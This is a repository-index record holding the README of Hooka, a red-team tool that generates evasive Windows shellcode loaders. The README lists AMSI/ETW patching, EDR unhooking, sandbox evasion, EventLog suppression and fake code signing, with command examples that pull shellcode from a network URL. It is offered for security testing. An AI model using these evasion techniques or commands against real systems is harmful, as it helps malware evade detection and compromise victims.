{"id":17383476,"url":"https://github.com/d3ext/hooka","last_synced_at":"2025-05-15T18:03:59.511Z","repository":{"id":103773548,"uuid":"601326022","full_name":"D3Ext/Hooka","owner":"D3Ext","description":"Shellcode loader generator with multiples features","archived":false,"fork":false,"pushed_at":"2024-12-31T10:12:46.000Z","size":1213,"stargazers_count":478,"open_issues_count":7,"forks_count":71,"subscribers_count":9,"default_branch":"main","last_synced_at":"2025-05-15T18:03:56.699Z","etag":null,"topics":["golang","malware","red-team"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/D3Ext.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":null,"patreon":null,"open_collective":null,"ko_fi":"d3ext","tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"lfx_crowdfunding":null,"custom":null}},"created_at":"2023-02-13T20:43:03.000Z","updated_at":"2025-04-24T14:58:49.000Z","dependencies_parsed_at":null,"dependency_job_id":"5ad44f9e-142d-441e-b5d4-02c01515cba7","html_url":"https://github.com/D3Ext/Hooka","commit_stats":null,"previous_names":[],"tags_count":5,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FHooka","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FHooka/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FHooka/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/
GitHub/repositories/D3Ext%2FHooka/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/D3Ext","download_url":"https://codeload.github.com/D3Ext/Hooka/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254394720,"owners_count":22063984,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["golang","malware","red-team"],"created_at":"2024-10-16T07:42:54.673Z","updated_at":"2025-05-15T18:03:59.491Z","avatar_url":"https://github.com/D3Ext.png","language":"Go","readme":"\u003cp align=\"center\"\u003e\n  \u003ch1 align=\"center\"\u003eHooka\u003c/h1\u003e\n  \u003ch4 align=\"center\"\u003eShellcode loader generator with multiple features\u003c/h4\u003e\n  \u003ch6 align=\"center\"\u003eCoded with 💙 by D3Ext\u003c/h6\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n\n  \u003ca href=\"https://opensource.org/licenses/MIT\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/license-MIT-_red.svg\"\u003e\n  \u003c/a\u003e\n\n  \u003ca href=\"https://github.com/D3Ext/Hooka/blob/main/CHANGELOG.md\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/maintained%3F-yes-brightgreen.svg\"\u003e\n  \u003c/a\u003e\n\n  \u003ca href=\"https://github.com/D3Ext/go-recon/issues\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat\"\u003e\n  \u003c/a\u003e\n\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"#introduction\"\u003eIntroduction\u003c/a\u003e •\n  \u003ca href=\"#features\"\u003eFeatures\u003c/a\u003e •\n  \u003ca 
href=\"#usage\"\u003eUsage\u003c/a\u003e •\n  \u003ca href=\"#library\"\u003eLibrary\u003c/a\u003e •\n  \u003ca href=\"#disclaimer\"\u003eDisclaimer\u003c/a\u003e\n\u003c/p\u003e\n\n# Introduction\n\nHooka generates shellcode loaders with multiple capabilities. It is based on other tools like [BokuLoader](https://github.com/boku7/BokuLoader), [Freeze](https://github.com/optiv/Freeze) or [Shhhloader](https://github.com/icyguider/Shhhloader), and it tries to implement more evasion features. Why Golang? Although it's not the perfect language for malware development, it works perfectly for testing purposes. Obviously, if you want something professional and foolproof you should create your own loader in C++, C# or a similar language.\n\n# Features\n\nThis tool is able to generate loaders with these features:\n\n- Multiple shellcode injection techniques:\n  - SuspendedProcess\n  - ProcessHollowing\n  - NtCreateThreadEx\n  - EtwpCreateEtwThread\n  - NtQueueApcThreadEx\n  - No-RWX\n\n- Get shellcode from a raw file, a PE, a DLL or a URL\n- EXE and DLL are supported as output loader formats\n\n- Encrypt shellcode using:\n  - AES\n  - 3DES\n  - RC4\n  - XOR\n\n- AMSI and ETW patching (enabled by default)\n- Random variable and function names\n- Shikata Ga Nai obfuscation (see [here](https://github.com/EgeBalci/sgn))\n- Multiple ways to detect sandboxing\n- Check if username and computer name match before running\n- Enable ACG Guard protection\n- Block non-Microsoft signed DLLs from injecting into created processes\n\n- Capable of unhooking user-mode hooks via multiple techniques:\n  - Classic\n  - Full DLL\n  - Perun's Fart technique\n\n- ***Phant0m*** technique to suspend EventLog threads (see [here](https://github.com/hlldz/Phant0m))\n- Windows API hashing (see [here](https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware))\n- Sign shellcode loader with fake or real certificates\n- String obfuscation via Caesar cipher (see 
[here](https://en.wikipedia.org/wiki/Caesar_cipher))\n- Reduce loader size using the Go compiler and UPX (if it's installed)\n- Compute binary entropy of the loader\n- Compute MD5, SHA1 and SHA256 checksums to keep track of the loader\n\n# Installation\n\nClone the repository and build it:\n\n```sh\ngit clone https://github.com/D3Ext/Hooka\ncd Hooka\nmake\n```\n\nAfter that you will find the binary under the `build/` folder.\n\n# Usage\n\n\u003e Help panel\n```\nUsage of Hooka:\n  REQUIRED:\n    -i, --input string        payload to inject in raw format, as PE, as DLL or from a URL\n    -o, --output string       name of output file (i.e. loader.exe)\n    -f, --format string       format of the payload to generate (available: exe, dll) (default exe)\n\n  EXECUTION:\n    --proc string      process to spawn (in suspended state) when needed for given execution technique (default notepad.exe)\n    --exec string      technique used to load shellcode (default \"SuspendedProcess\"):\n                         SuspendedProcess\n                         ProcessHollowing\n                         NtCreateThreadEx\n                         EtwpCreateEtwThread\n                         NtQueueApcThreadEx\n                         No-RWX\n\n  AUXILIARY:\n    -a, --arch string       architecture of the loader to generate (default amd64)\n    -c, --cert string       certificate to sign generated loader with (i.e. cert.pfx)\n    -d, --domain string     domain used to sign loader (i.e. 
www.microsoft.com)\n\n  ENCODING:\n    --enc string         encrypts shellcode using given algorithm (available: aes, 3des, rc4, xor) (default none)\n    --sgn                use Shikata Ga Nai to encode generated loader (it must be installed on path)\n    --strings            obfuscate strings using Caesar cipher\n\n  EVASION:\n    --unhook string         unhooking technique to use (available: full, peruns)\n    --sandbox               enable sandbox evasion\n    --no-amsi               don't patch AMSI\n    --no-etw                don't patch ETW\n    --hashing               use hashes to retrieve function pointers\n    --user string           proceed only when the user running the loader is the expected (i.e. DESKTOP-E1D6G0A\\admin)\n    --computername string   proceed only when the computer name is the expected (i.e. DESKTOP-E1D6G0A)\n    --acg                   enable ACG Guard to prevent AV/EDR from modifying existing executable code\n    --blockdlls             prevent non-Microsoft signed DLLs from injecting in child processes\n    --phantom               suspend EventLog threads using Phant0m technique. 
High privileges needed, otherwise loader skips this step\n    --sleep                 delay shellcode execution using a custom sleep function\n\n  EXTRA:\n    --calc              use a calc.exe shellcode to test loader capabilities (don't provide input file)\n    --compress          compress generated loader using Golang compiler and UPX if it's installed\n    -r, --rand          use a random set of parameters to create a random loader (just for testing purposes)\n    -v, --verbose       enable verbose to print extra information\n    -h, --help          print help panel\n\nExamples:\n  hooka -i shellcode.bin -o loader.exe\n  hooka -i http://192.168.1.126/shellcode.bin -o loader.exe\n  hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg\n  hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose\n```\n\n\u003e Generate a simple EXE loader\n```sh\n$ hooka_linux_amd64 -i shellcode.bin -o loader.exe\n```\n\n\u003e Generate a DLL loader\n```sh\n$ hooka_linux_amd64 -i shellcode.bin -o loader.dll -f dll\n```\n\n\u003e Use a custom config (various examples)\n```sh\n$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --hashing --acg --sleep --verbose\n$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --exec ProcessHollowing --sgn --strings --blockdlls\n$ hooka_linux_amd64 -i http://xx.xx.xx.xx/shellcode.bin -o loader.exe --sandbox --sleep --domain www.microsoft.com --verbose\n$ hooka_linux_amd64 --calc -o loader.exe --user \"DESKTOP-E1D6G0A\\tom\" --computername \"DESKTOP-E1D6G0A\" --compress --strings\n```\n\n# Demo\n\n\u003cimg src=\"https://raw.githubusercontent.com/D3Ext/Hooka/main/assets/demo1.png\"\u003e\n\n\u003cimg src=\"https://raw.githubusercontent.com/D3Ext/Hooka/main/assets/demo2.png\"\u003e\n\n# TODO\n\n- ~~Check username and hostname before running~~\n- Add direct and indirect syscalls\n- Add ChaCha20 cipher to encrypt shellcode\n\n# Library\n\nThe official Golang package has most of the already mentioned features 
and some others. To use it, see the [examples](https://github.com/D3Ext/Hooka/tree/main/examples) and the [package source](https://github.com/D3Ext/Hooka/tree/main/pkg/hooka).\n\n# References\n\nThe techniques mentioned above are covered in these resources:\n\n```\nhttps://github.com/C-Sto/BananaPhone\nhttps://github.com/timwhitez/Doge-Gabh\nhttps://github.com/Ne0nd0g/go-shellcode\nhttps://github.com/optiv/Freeze\nhttps://github.com/f1zm0/acheron\nhttps://github.com/Enelg52/OffensiveGo\nhttps://github.com/trickster0/TartarusGate\nhttps://github.com/Kara-4search/HookDetection_CSharp\nhttps://github.com/RedLectroid/APIunhooker\nhttps://github.com/plackyhacker/Peruns-Fart\nhttps://github.com/rasta-mouse/TikiTorch\nhttps://github.com/phra/PEzor\nhttps://github.com/S1ckB0y1337/Cobalt-Strike-CheatSheet\nhttps://github.com/chvancooten/maldev-for-dummies\nhttps://blog.sektor7.net/#!res/2021/perunsfart.md\nhttps://teamhydra.blog/2020/09/18/implementing-direct-syscalls-using-hells-gate/\nhttps://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions#checking-for-hooks\nhttps://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++\nhttps://www.ired.team/offensive-security/defense-evasion/retrieving-ntdll-syscall-stubs-at-run-time\nhttps://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware\nhttps://winternl.com/detecting-manual-syscalls-from-user-mode/\n```\n\n# Disclaimer\n\nUse this project under your own responsibility! 
The author is not responsible for any misuse of the project.\n\n# License\n\nThis project is under the [MIT](https://github.com/D3Ext/Hooka/blob/main/LICENSE) license.\n\nCopyright © 2025, *D3Ext*\n\n\n\n","funding_links":["https://ko-fi.com/d3ext"],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fhooka","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fd3ext%2Fhooka","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fhooka/lists"}